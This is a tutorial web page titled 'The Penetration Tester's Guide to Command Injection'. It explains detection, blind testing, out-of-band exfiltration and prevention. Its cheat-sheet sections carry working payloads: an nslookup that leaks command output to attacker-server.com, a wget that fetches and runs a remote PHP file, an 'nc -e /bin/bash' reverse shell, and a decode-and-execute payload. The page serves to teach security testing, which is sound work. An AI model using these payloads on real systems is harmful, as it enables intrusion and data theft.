JIYIK CN >

Current Location:Home > Learning > NETWORK >
WEB FRONT-END PROGRAM NETWORK ALGORITHM OPERATING SYSTEM DATABASE

The Penetration Tester's Guide to Command Injection

Author:JIYIK Last Updated:2025/03/17 Views:

What is command injection?

Command injection is an attack whose goal is to execute arbitrary commands on the host operating system through a vulnerable application. These types of attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to the system shell. In such an attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Often, they are possible due to insufficient input validation.

This attack is different from code injection because code injection allows the attacker to add their own code which is then executed by the application. In command injection, the attacker extends the default functionality of the application to execute system commands without injecting code.

What are the effects of command injection?

This vulnerability allows an attacker to run operating system commands with the privileges of the vulnerable application. Depending on the privileges of the current user, this vulnerability could lead to access to the system, disclosure of critical sensitive data, and could lead to complete control takeover of the server or system.

How to detect and exploit them?

Assume that you are testing the parameters of the following URL during a penetration test:

https://vulnerable-website.com/endpoint?parameter=123

To detect if the source code is not protected against command injection, we can try several methods:

Insert special characters to detect delimiters:

We can inject some special characters to see if the application blocks anything that could be used for command injection:

&
;
换行符 (0x0a or \n)
&&
|
||

If the application does not throw any error messages, we can try to inject our command after using one of these delimiters.

https://vulnerable-website.com/endpoint?parameter=1|whoami

Detecting blind operating system command injection

Time delay

Most operating system command injections are blind, which does not provide any output for the executed command. To verify the vulnerability, we can use a time delay to verify the command injection after detecting the allowed special characters, as shown below:

https://vulnerable-website.com/endpoint?parameter=x||ping+-c+10+127.0.0.1||

Redirecting Output

We can also redirect the output of the command in an output file and then retrieve that file on the browser. A payload similar to the following can be used:

https://vulnerable-website.com/endpoint?parameter=||whoami>/var/www/images/output.txt||

OOB (Out Of Band) Usage

We can also trigger OOB network interactions with external servers such as Burp Collaborator. We can use a payload similar to the following:

https://vulnerable-website.com/endpoint?parameter=x||nslookup+burp.collaborator.address||

Alternatively, we can use a payload similar to the following to leak the output of the command:

https://vulnerable-website.com/endpoint?parameter=||nslookup+`whoami`.burp.collaborator.address||

The most common parameters that can be considered when testing for command injection are as follows:

cmd

  • exec
  • command
  • execute
  • ping
  • query
  • jump
  • code
  • reg
  • do
  • func
  • arg
  • option
  • load
  • process
  • step
  • read
  • function
  • req
  • feature
  • exe
  • module
  • payload
  • run
  • print

Notes

Special characters

&
;
换行符 (0x0a or \n)
&&
|
||
command \`
$(command )

Linux command:

whoami
ifconfig
ls
uname -a

Windows command:

whoami
ipconfig
dir
ver

Supported by both Unix and Windows

ls||id; ls ||id; ls|| id; ls || id 
ls|id; ls |id; ls| id; ls | id 
ls&&id; ls &&id; ls&& id; ls && id 
ls&id; ls &id; ls& id; ls & id 
ls %0A id

Time delay command

& ping -c 10 127.0.0.1 &

Redirecting Output

& whoami > /var/www/images/output.txt &

OOB (Out Of Band) Usage

& nslookup attacker-server.com &
& nslookup `whoami`.attacker-server.com &

Bypassing WAF

vuln=127.0.0.1 %0a wget https://evil.txt/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash <attacker-ip> <attacker-port>
vuln=echo PAYLOAD > /tmp/payload.txt; cat /tmp/payload.txt | base64 -d > /tmp/payload; chmod 744 /tmp/payload; /tmp/payload

How to prevent it?

There are many ways to prevent this vulnerability. Here are a few suggestions:

  • Avoid using shell execution functions. If unavoidable, limit their use to very specific use cases.
  • Perform proper input validation when passing user input into the shell to execute commands.
  • Use secure APIs when accepting user input into your application.
  • Escape special characters when the security API is not available.

Previous:The Penetration Tester's Guide to Cross-Site Scripting (XSS)

Next:How to avoid cross-origin (CORS) issues in React/Next.js

For reprinting, please send an email to 1244347461@qq.com for approval. After obtaining the author's consent, kindly include the source as a link.

Article URL:

Related Articles

What multipart/form-data does in post Upload upload files

Publish Date:2025/03/18 Views:64 Category:NETWORK

Everyone has used the attribute enctype="multipart/form-data" when uploading files using a form. What is the role of multipart/form-data? Let's talk about this topic. First, let's look at a case Look at the first code   form action= "handl

About application/x-www-form-urlencoded

Publish Date:2025/03/18 Views:148 Category:NETWORK

As a data format of form, application/x-www-form-urlencoded has its own characteristics   form action= "handle.php" method= "post"    input type= "text" name= " uname"   class= " uname" /br /    input type= "text" name= "email" class=

My understanding of webservice is this

Publish Date:2025/03/18 Views:150 Category:NETWORK

Recently, I encountered such a project at work (temporarily named Project A). Project A itself was developed in PHP, but its data came from another project developed in Java (temporarily named Project B). Project A could not operate the dat

WSDL looks like this

Publish Date:2025/03/18 Views:192 Category:NETWORK

When I first started learning Webservice, I found that there were quite a lot of knowledge points involved, and each point could be a school of its own. Especially when I saw WSDL, I looked up information for a long time, but I was still a

Which technology do you choose to implement the web chat room?

Publish Date:2025/03/18 Views:62 Category:NETWORK

With the rise of HTML5 Websockets, web chat applications are becoming more and more popular. Recently, I am working on a mobile web application, the core function of which is to implement web chat on the mobile phone. Of course, the functio

Implementing a group chat room using socket.io

Publish Date:2025/03/18 Views:68 Category:NETWORK

This article will share with you an example of using socket.io to realize the function of group chat. If you want to use socket.io, you must use nodejs to implement the server, so we need to install socket.io in nodejs Install socket.io How

First contact with CGI

Publish Date:2025/03/18 Views:52 Category:NETWORK

Since I am a PHP programmer, I often have to build a PHP operating environment. The popular nginx+php environment is very popular, and the mode it adopts is the FastCGI method, so I spent some time to learn about FastCGI. CGI (Common Gatewa

Getting started with FastCGI

Publish Date:2025/03/18 Views:166 Category:NETWORK

In "First Contact with CGI", we mentioned the operating mechanisms of CGI and Server APIs, as well as their respective advantages and disadvantages. In this chapter, we will learn about FastCGI, which combines the advantages of CGI and Serv

Scan to Read All Tech Tutorials

Social Media
  • https://www.github.com/onmpw
  • qq:1244347461

Recommended

Tags

Java PHP Python Operating PostgreSQL Mysql Mongodb redis git Docker Operating Sy Algorithm Network React Vue WEB Js Javascript Prototype Pandas Jquery Angular Flask Django
Scan the Code
Easier Access Tutorial